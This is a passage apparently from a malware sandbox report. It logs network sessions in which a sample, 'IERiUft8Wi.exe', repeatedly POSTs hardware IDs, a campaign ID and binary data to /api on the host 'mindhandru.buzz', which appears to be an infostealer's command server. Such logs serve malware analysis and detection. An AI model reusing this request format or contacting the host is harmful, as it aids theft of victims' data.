2024-12-27 07:46:31 UTC	893	IN	Data Raw: 43 43 75 63 4f 70 66 74 4e 74 72 47 48 37 4d 72 50 70 57 4e 75 31 6d 43 64 71 7a 76 6f 4d 6b 76 4a 45 78 55 69 65 43 77 30 2f 54 4b 75 45 6f 71 51 53 4f 33 48 41 47 5a 4d 36 79 39 68 45 68 71 6e 68 47 32 72 66 34 31 47 66 30 30 33 39 51 50 4d 32 63 44 76 4d 6f 37 53 75 2b 41 5a 65 59 5a 55 64 79 67 62 76 77 56 6e 48 6a 65 55 66 63 73 76 37 4a 62 4c 2b 57 4f 6b 55 76 68 4d 6c 44 30 7a 58 6b 4a 36 6b 4d 67 64 4a 77 42 6d 48 46 73 66 45 51 4b 61 4d 2f 42 35 32 34 35 70 73 38 39 4c 34 36 52 79 4f 42 30 67 7a 70 65 50 46 6d 73 30 79 42 31 44 70 52 4b 38 6d 35 2f 78 55 69 72 48 78 42 31 71 33 2b 79 57 4b 35 6d 43 31 52 49 59 50 4f 54 63 45 79 34 43 36 70 42 59 33 52 66 77 35 76 67 66 4b 38 45 54 48 6a 4a 77 6e 38 73 76 58 58 62 71 4f 64 66 30 68 71 6c 49 52 4a Data Ascii: CCucOpftNtrGH7MrPpWNu1mCdqzvoMkvJExUieCw0/TKuEoqQSO3HAGZM6y9hEhqnhG2rf41Gf0039QPM2cDvMo7Su+AZeYZUdygbvwVnHjeUfcsv7JbL+WOkUvhMlD0zXkJ6kMgdJwBmHFsfEQKaM/B5245ps89L46RyOB0gzpePFms0yB1DpRK8m5/xUirHxB1q3+yWK5mC1RIYPOTcEy4C6pBY3Rfw5vgfK8ETHjJwn8svXXbqOdf0hqlIRJ
2024-12-27 07:46:31 UTC	1369	IN	Data Raw: 31 38 34 31 0d 0a 75 4d 64 41 33 54 2f 34 61 4c 56 43 6e 35 68 39 42 53 75 5a 2f 50 4d 5a 4a 71 74 2f 53 4e 6d 79 2b 74 70 70 75 4a 51 38 57 79 69 46 79 55 4c 58 4e 2b 59 67 71 51 53 55 31 6e 51 50 62 63 47 35 76 46 68 70 70 47 63 4a 68 66 2f 61 31 58 4f 67 6c 6e 31 69 4a 34 50 4b 53 63 56 34 38 57 61 7a 54 49 48 55 4f 6c 45 72 7a 37 48 33 47 69 36 71 66 6b 72 64 74 66 44 55 62 72 79 56 50 31 6f 6c 68 73 78 49 33 6a 50 68 4a 36 30 45 68 64 52 2f 42 47 69 42 38 72 77 52 4d 65 4d 6e 43 66 69 78 2f 63 70 31 39 71 67 38 57 53 71 4b 30 67 37 4d 64 76 64 6f 72 51 44 47 67 44 6f 44 62 4d 61 34 38 52 77 71 70 33 74 45 30 72 62 33 30 6e 61 2b 6b 54 46 46 4b 59 66 42 51 4e 38 39 34 53 69 72 44 59 6a 53 63 55 6b 6c 67 62 76 6b 56 6e 48 6a 55 45 54 4e 72 66 54 51 64 Data Ascii: 1841uMdA3T/4aLVCn5h9BSuZ/PMZJqt/SNmy+tppuJQ8WyiFyULXN+YgqQSU1nQPbcG5vFhppGcJhf/a1XOgln1iJ4PKScV48WazTIHUOlErz7H3Gi6qfkrdtfDUbryVP1olhsxI3jPhJ60EhdR/BGiB8rwRMeMnCfix/cp19qg8WSqK0g7MdvdorQDGgDoDbMa48Rwqp3tE0rb30na+kTFFKYfBQN894SirDYjScUklgbvkVnHjUETNrfTQd
2024-12-27 07:46:31 UTC	1369	IN	Data Raw: 51 50 4d 32 63 44 76 77 37 2b 43 4c 71 45 38 6a 42 4f 67 35 6e 67 65 53 38 48 43 57 6e 66 45 58 55 73 2f 50 61 59 4c 4f 51 4f 31 63 69 69 38 46 50 32 44 44 69 4a 36 41 41 67 74 52 7a 44 32 66 43 76 2f 70 57 5a 2b 4e 34 55 5a 33 6e 76 76 70 70 76 35 45 2f 56 44 57 4b 68 41 43 54 4e 75 67 6f 36 6c 53 51 79 47 30 4f 64 49 2b 6c 76 42 45 6c 34 79 63 4a 31 36 33 37 31 57 43 2b 6d 44 74 62 4c 6f 33 42 58 4e 73 2b 36 53 53 69 43 59 6e 65 66 77 52 73 79 72 2f 75 42 43 71 6e 63 55 57 64 38 62 37 63 66 50 54 46 66 33 49 7a 6a 74 52 49 30 48 6a 78 5a 72 4e 4d 67 64 51 36 55 53 76 42 73 76 41 64 4c 71 68 30 54 64 6d 2f 38 39 42 71 75 70 51 7a 58 79 69 4b 31 6b 50 57 4d 4f 51 68 72 77 43 4c 32 32 67 4b 61 6f 48 79 76 42 45 78 34 79 63 4a 2b 6f 7a 4a 2b 43 53 72 30 79 Data Ascii: QPM2cDvw7+CLqE8jBOg5ngeS8HCWnfEXUs/PaYLOQO1cii8FP2DDiJ6AAgtRzD2fCv/pWZ+N4UZ3nvvppv5E/VDWKhACTNugo6lSQyG0OdI+lvBEl4ycJ16371WC+mDtbLo3BXNs+6SSiCYnefwRsyr/uBCqncUWd8b7cfPTFf3IzjtRI0HjxZrNMgdQ6USvBsvAdLqh0Tdm/89BqupQzXyiK1kPWMOQhrwCL22gKaoHyvBEx4ycJ+ozJ+CSr0y
2024-12-27 07:46:31 UTC	1369	IN	Data Raw: 68 42 61 54 46 4f 30 6e 6f 55 79 5a 6c 6d 4e 4a 62 4d 33 38 70 46 59 75 71 33 64 48 33 72 6e 31 31 32 69 31 6c 44 6c 53 4c 49 72 4c 53 64 6f 2f 37 69 36 34 43 34 76 52 65 67 4a 69 79 37 6a 39 48 57 6e 74 50 30 37 46 2f 36 61 62 56 72 4f 4c 4c 31 52 6b 6b 6f 70 58 6b 7a 2f 69 61 50 4a 4d 69 38 70 37 44 48 6e 46 73 2f 63 45 49 71 56 2f 54 4d 2b 34 38 74 46 72 74 35 55 79 56 43 79 66 78 45 50 54 4b 76 77 75 6f 51 4c 47 6c 6a 6f 4f 63 34 48 6b 76 43 63 2b 71 44 39 57 6b 36 61 2b 33 47 6a 30 78 58 39 55 4c 6f 44 4b 58 4e 63 2b 35 53 75 6b 42 49 50 51 66 67 4e 6d 7a 72 66 32 48 79 47 6a 63 45 7a 56 74 50 6a 56 5a 62 4b 52 4d 68 64 71 7a 63 4e 57 6b 32 43 75 44 37 41 42 67 4d 39 72 50 47 7a 42 37 62 77 4a 5a 37 6f 2f 54 74 48 2f 70 70 74 70 75 4a 63 79 55 69 43 Data Ascii: hBaTFO0noUyZlmNJbM38pFYuq3dH3rn112i1lDlSLIrLSdo/7i64C4vRegJiy7j9HWntP07F/6abVrOLL1RkkopXkz/iaPJMi8p7DHnFs/cEIqV/TM+48tFrt5UyVCyfxEPTKvwuoQLGljoOc4HkvCc+qD9Wk6a+3Gj0xX9ULoDKXNc+5SukBIPQfgNmzrf2HyGjcEzVtPjVZbKRMhdqzcNWk2CuD7ABgM9rPGzB7bwJZ7o/TtH/pptpuJcyUiC
2024-12-27 07:46:31 UTC	1369	IN	Data Raw: 48 62 33 61 4b 30 41 78 6f 41 36 42 32 62 48 76 66 30 65 49 61 4e 35 51 39 6d 38 39 39 68 6a 76 5a 73 30 56 43 36 43 77 30 6a 58 4f 4f 55 76 70 41 71 44 30 33 4e 4a 4a 59 47 37 35 46 5a 78 34 31 6c 71 7a 36 33 4d 31 57 65 76 33 53 41 5a 50 63 33 44 51 70 4e 67 72 69 4f 69 41 35 54 64 63 77 46 76 79 4c 7a 34 48 43 53 6b 66 30 7a 51 75 76 72 56 59 4c 4f 64 4d 31 67 6a 68 63 74 4b 30 7a 65 75 5a 75 6f 4c 6e 70 67 69 53 55 76 4b 71 74 30 59 49 72 45 2f 56 70 4f 6d 76 74 78 6f 39 4d 56 2f 57 53 32 4d 7a 45 44 66 4d 4f 6f 36 71 67 65 50 31 33 73 47 61 38 4b 39 39 68 34 37 70 58 39 43 31 62 6a 32 33 32 71 6d 6e 44 41 58 61 73 33 44 56 70 4e 67 72 68 6d 38 43 34 48 58 4f 43 42 73 32 72 33 32 46 53 4b 76 50 31 61 54 70 72 37 63 61 50 54 46 66 31 6f 6f 67 4d 42 63 Data Ascii: Hb3aK0AxoA6B2bHvf0eIaN5Q9m899hjvZs0VC6Cw0jXOOUvpAqD03NJJYG75FZx41lqz63M1Wev3SAZPc3DQpNgriOiA5TdcwFvyLz4HCSkf0zQuvrVYLOdM1gjhctK0zeuZuoLnpgiSUvKqt0YIrE/VpOmvtxo9MV/WS2MzEDfMOo6qgeP13sGa8K99h47pX9C1bj232qmnDAXas3DVpNgrhm8C4HXOCBs2r32FSKvP1aTpr7caPTFf1oogMBc
2024-12-27 07:46:31 UTC	741	IN	Data Raw: 54 71 56 4d 62 54 64 41 78 71 7a 62 62 37 47 44 75 69 64 55 58 63 75 50 6e 51 64 72 2b 50 4e 46 38 6e 67 38 78 48 30 7a 62 75 4b 61 63 4d 78 70 59 36 44 6e 4f 42 35 4c 77 7a 43 72 52 70 51 35 2b 63 36 63 31 75 73 35 45 70 58 43 57 4f 30 6b 50 44 65 4b 42 6f 75 77 75 58 6d 43 49 66 65 39 61 37 34 31 67 77 34 33 68 46 6e 65 65 2b 30 47 75 36 6b 44 52 54 4c 59 6a 4d 54 64 59 39 35 43 53 6d 44 59 37 52 63 41 78 75 78 37 62 2f 47 43 61 69 63 30 33 55 73 66 65 62 4b 76 53 61 4a 78 64 38 7a 66 4a 65 31 43 44 6a 4f 4f 67 2b 68 63 6c 72 48 47 62 52 75 72 34 35 4b 71 39 38 54 4e 71 76 76 73 51 71 72 64 30 34 57 32 54 56 68 45 37 58 4e 4f 30 76 70 41 4f 4c 31 33 30 43 5a 4d 75 79 37 68 6b 73 71 33 4e 42 30 4b 33 30 30 58 61 39 6c 44 4a 5a 4c 4a 2f 48 44 70 31 34 36 Data Ascii: TqVMbTdAxqzbb7GDuidUXcuPnQdr+PNF8ng8xH0zbuKacMxpY6DnOB5LwzCrRpQ5+c6c1us5EpXCWO0kPDeKBouwuXmCIfe9a741gw43hFnee+0Gu6kDRTLYjMTdY95CSmDY7RcAxux7b/GCaic03UsfebKvSaJxd8zfJe1CDjOOg+hclrHGbRur45Kq98TNqvvsQqrd04W2TVhE7XNO0vpAOL130CZMuy7hksq3NB0K300Xa9lDJZLJ/HDp146
2024-12-27 07:46:31 UTC	1369	IN	Data Raw: 38 30 38 0d 0a 42 45 2b 72 44 38 48 6e 62 6d 2b 67 7a 66 36 33 54 74 47 5a 4e 57 55 48 49 68 74 76 58 2f 36 58 70 6d 57 59 30 6c 39 67 65 53 75 57 47 6d 78 50 78 47 64 2b 50 33 4a 64 72 4b 65 4b 56 52 6a 73 2f 70 70 79 54 58 6f 50 37 73 79 75 4e 39 67 42 47 33 57 72 62 41 44 4b 71 31 78 54 73 76 2f 73 4a 74 72 39 4d 55 47 46 32 7a 4e 2b 77 43 54 49 4b 35 77 36 6a 6d 46 31 6e 51 4f 66 64 44 78 32 77 77 6b 70 57 68 59 6e 66 47 2b 33 53 54 73 7a 58 45 58 49 4a 79 45 46 6f 4e 71 74 58 33 35 57 39 61 4b 5a 55 64 79 67 61 71 38 54 6e 76 74 50 31 75 64 35 37 36 63 5a 36 61 50 4f 56 51 79 6a 6f 4e 77 37 52 62 70 4c 71 38 4c 6c 70 70 55 41 6e 2f 47 2f 4c 4a 57 4a 75 4d 6e 63 4a 33 33 76 75 51 71 39 49 56 2f 44 32 53 34 78 30 44 64 50 2f 67 35 35 79 4b 42 33 6e 38 Data Ascii: 808BE+rD8Hnbm+gzf63TtGZNWUHIhtvX/6XpmWY0l9geSuWGmxPxGd+P3JdrKeKVRjs/ppyTXoP7syuN9gBG3WrbADKq1xTsv/sJtr9MUGF2zN+wCTIK5w6jmF1nQOfdDx2wwkpWhYnfG+3STszXEXIJyEFoNqtX35W9aKZUdygaq8TnvtP1ud576cZ6aPOVQyjoNw7RbpLq8LlppUAn/G/LJWJuMncJ33vuQq9IV/D2S4x0DdP/g55yKB3n8
2024-12-27 07:46:31 UTC	694	IN	Data Raw: 4f 70 57 63 66 45 78 43 63 2f 2f 70 70 73 6a 74 34 38 74 55 53 65 62 78 77 6e 74 42 73 6b 6d 72 51 32 51 79 47 30 47 4a 4f 2b 4b 33 53 67 58 74 6e 78 48 30 37 6a 6f 79 69 54 36 33 54 41 58 66 4c 53 45 42 70 4d 48 6f 47 69 79 54 4e 36 59 54 77 70 6c 7a 37 76 71 42 32 53 45 63 55 37 63 71 65 37 4d 61 2f 75 7a 43 58 5a 6b 77 34 52 49 6b 32 43 38 5a 75 6f 49 6c 35 67 69 57 54 6d 61 36 61 39 42 65 66 46 67 42 38 54 2f 36 4a 73 38 35 74 4e 2f 52 57 54 56 68 41 6e 51 4b 76 77 75 71 52 71 46 6e 30 51 33 54 4d 2b 37 2f 51 41 35 72 6e 4e 6f 33 71 37 30 35 56 71 68 6e 6a 46 5a 49 35 76 56 44 70 31 34 34 57 6a 79 4e 63 61 51 4f 6a 59 6c 67 61 53 38 54 6d 6d 57 66 45 66 54 75 4f 6a 4b 4b 5a 4f 54 4f 46 59 79 6e 63 6c 43 38 6a 76 2f 49 75 70 43 78 74 34 36 55 54 6d 50 Data Ascii: OpWcfExCc//ppsjt48tUSebxwntBskmrQ2QyG0GJO+K3SgXtnxH07joyiT63TAXfLSEBpMHoGiyTN6YTwplz7vqB2SEcU7cqe7Ma/uzCXZkw4RIk2C8ZuoIl5giWTma6a9BefFgB8T/6Js85tN/RWTVhAnQKvwuqRqFn0Q3TM+7/QA5rnNo3q705VqhnjFZI5vVDp144WjyNcaQOjYlgaS8TmmWfEfTuOjKKZOTOFYynclC8jv/IupCxt46UTmP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49702	104.21.11.101	443	788	C:\Users\user\Desktop\IERiUft8Wi.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 07:46:33 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=KL0X99L81JFM9JA User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12826 Host: mindhandru.buzz
2024-12-27 07:46:33 UTC	12826	OUT	Data Raw: 2d 2d 4b 4c 30 58 39 39 4c 38 31 4a 46 4d 39 4a 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 35 35 36 39 38 41 30 30 46 34 37 41 42 43 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 4b 4c 30 58 39 39 4c 38 31 4a 46 4d 39 4a 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4b 4c 30 58 39 39 4c 38 31 4a 46 4d 39 4a 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 4b 4c 30 58 39 Data Ascii: --KL0X99L81JFM9JAContent-Disposition: form-data; name="hwid"955698A00F47ABCBBEBA0C6A975F1733--KL0X99L81JFM9JAContent-Disposition: form-data; name="pid"2--KL0X99L81JFM9JAContent-Disposition: form-data; name="lid"PsFKDg--pablo--KL0X9
2024-12-27 07:46:34 UTC	1134	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 07:46:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=nd7c9s7fh5aem6ritu784u0gvn; expires=Tue, 22 Apr 2025 01:33:12 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=42Z7aOQFt%2F4cMydTBpU6%2FAMFjxOwTqQW8zg%2FOXUK6t3gColf3t7qzjscyYvQvgKseNiw8RDd8VVEWJes8LJtT%2Fuw%2BX6mGTZvpmcaBGgV4KGLCqb9VgiaT%2BoLO1Ix96uItSQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f87b28e3a418cc8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1771&min_rtt=1762&rtt_var=678&sent=14&recv=18&lost=0&retrans=0&sent_bytes=2837&recv_bytes=13762&delivery_rate=1592148&cwnd=237&unsent_bytes=0&cid=db50bac25ea6ebe4&ts=1152&x=0"
2024-12-27 07:46:34 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-27 07:46:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49708	104.21.11.101	443	788	C:\Users\user\Desktop\IERiUft8Wi.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 07:46:35 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=VG1F1F6GT0R0NIEL User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15064 Host: mindhandru.buzz
2024-12-27 07:46:35 UTC	15064	OUT	Data Raw: 2d 2d 56 47 31 46 31 46 36 47 54 30 52 30 4e 49 45 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 35 35 36 39 38 41 30 30 46 34 37 41 42 43 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 56 47 31 46 31 46 36 47 54 30 52 30 4e 49 45 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 56 47 31 46 31 46 36 47 54 30 52 30 4e 49 45 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 56 47 Data Ascii: --VG1F1F6GT0R0NIELContent-Disposition: form-data; name="hwid"955698A00F47ABCBBEBA0C6A975F1733--VG1F1F6GT0R0NIELContent-Disposition: form-data; name="pid"2--VG1F1F6GT0R0NIELContent-Disposition: form-data; name="lid"PsFKDg--pablo--VG
2024-12-27 07:46:36 UTC	1133	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 07:46:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ps2oil3gr4kn9qjam7vk40eakb; expires=Tue, 22 Apr 2025 01:33:14 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u4Y4DSnww%2FCVqBWImO36BYCC%2FyaoxQkSdUNaMpt%2Fga1MLQVaJkPY8UW%2BXJyBQZO85%2FqQ720dCjdLnPwfJAArZT54C0Ws1tu7sdwF9jOG1XapR2wf4VDuQU40o3%2Bph2g1SCI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f87b29caea641cd-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1796&min_rtt=1763&rtt_var=685&sent=12&recv=19&lost=0&retrans=0&sent_bytes=2837&recv_bytes=16001&delivery_rate=1656267&cwnd=227&unsent_bytes=0&cid=14a2b75038ec55db&ts=813&x=0"
2024-12-27 07:46:36 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-27 07:46:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49714	104.21.11.101	443	788	C:\Users\user\Desktop\IERiUft8Wi.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 07:46:37 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=YCWJB536XGN User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20359 Host: mindhandru.buzz
2024-12-27 07:46:37 UTC	15331	OUT	Data Raw: 2d 2d 59 43 57 4a 42 35 33 36 58 47 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 35 35 36 39 38 41 30 30 46 34 37 41 42 43 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 59 43 57 4a 42 35 33 36 58 47 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 59 43 57 4a 42 35 33 36 58 47 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 59 43 57 4a 42 35 33 36 58 47 4e 0d 0a 43 6f 6e 74 Data Ascii: --YCWJB536XGNContent-Disposition: form-data; name="hwid"955698A00F47ABCBBEBA0C6A975F1733--YCWJB536XGNContent-Disposition: form-data; name="pid"3--YCWJB536XGNContent-Disposition: form-data; name="lid"PsFKDg--pablo--YCWJB536XGNCont
2024-12-27 07:46:37 UTC	5028	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d ae 2f f8 f5 58 32 78 29 1e bc 14 fc db e0 ab e6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 6K~`iO\_,mi`m?ls}Qm/X2x)
2024-12-27 07:46:38 UTC	1134	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 07:46:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=c7kpdm5d4b5llrpfoohtuticnb; expires=Tue, 22 Apr 2025 01:33:17 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ycgxjti1EFLNswPQPCR0K6N9tXiB33B%2BBInDOwVgOoMuMOB3uxea%2FF6suCjMCvgiEkW%2Bhhx8KpOZa2iWRD6ymd3kg4ILO8bhqJeul%2B%2Bl1NBoyQ4K%2BKONsswfbfjG22eVy1Q%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f87b2ab3c04437a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1995&min_rtt=1974&rtt_var=782&sent=18&recv=24&lost=0&retrans=0&sent_bytes=2837&recv_bytes=21313&delivery_rate=1363211&cwnd=223&unsent_bytes=0&cid=94f39eeceacfa6ed&ts=1050&x=0"
2024-12-27 07:46:38 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-27 07:46:38 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49720	104.21.11.101	443	788	C:\Users\user\Desktop\IERiUft8Wi.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 07:46:40 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=KZ3DWPSD5BMOKDKC User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1227 Host: mindhandru.buzz
2024-12-27 07:46:40 UTC	1227	OUT	Data Raw: 2d 2d 4b 5a 33 44 57 50 53 44 35 42 4d 4f 4b 44 4b 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 35 35 36 39 38 41 30 30 46 34 37 41 42 43 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 4b 5a 33 44 57 50 53 44 35 42 4d 4f 4b 44 4b 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4b 5a 33 44 57 50 53 44 35 42 4d 4f 4b 44 4b 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 4b 5a Data Ascii: --KZ3DWPSD5BMOKDKCContent-Disposition: form-data; name="hwid"955698A00F47ABCBBEBA0C6A975F1733--KZ3DWPSD5BMOKDKCContent-Disposition: form-data; name="pid"1--KZ3DWPSD5BMOKDKCContent-Disposition: form-data; name="lid"PsFKDg--pablo--KZ
2024-12-27 07:46:42 UTC	1127	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 07:46:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=2p62j0dcg7n4ju84vl8cersdi2; expires=Tue, 22 Apr 2025 01:33:19 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3Sv1wK%2BFD0zxjosDPOhziVHyGSuz%2BBcMK037MpAsWtzCnZBGICXX0iA%2Bgo4nr7zjPfqXk6VMQRAsq1C58I4wqqEpEx6bEkmVHwq6xkm22i9suIX%2FqPQVvDspxnqnCPccR3s%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f87b2bb7dfa7ce8-EWR alt-svc: h3=":443"; ma=86400 server-timing: 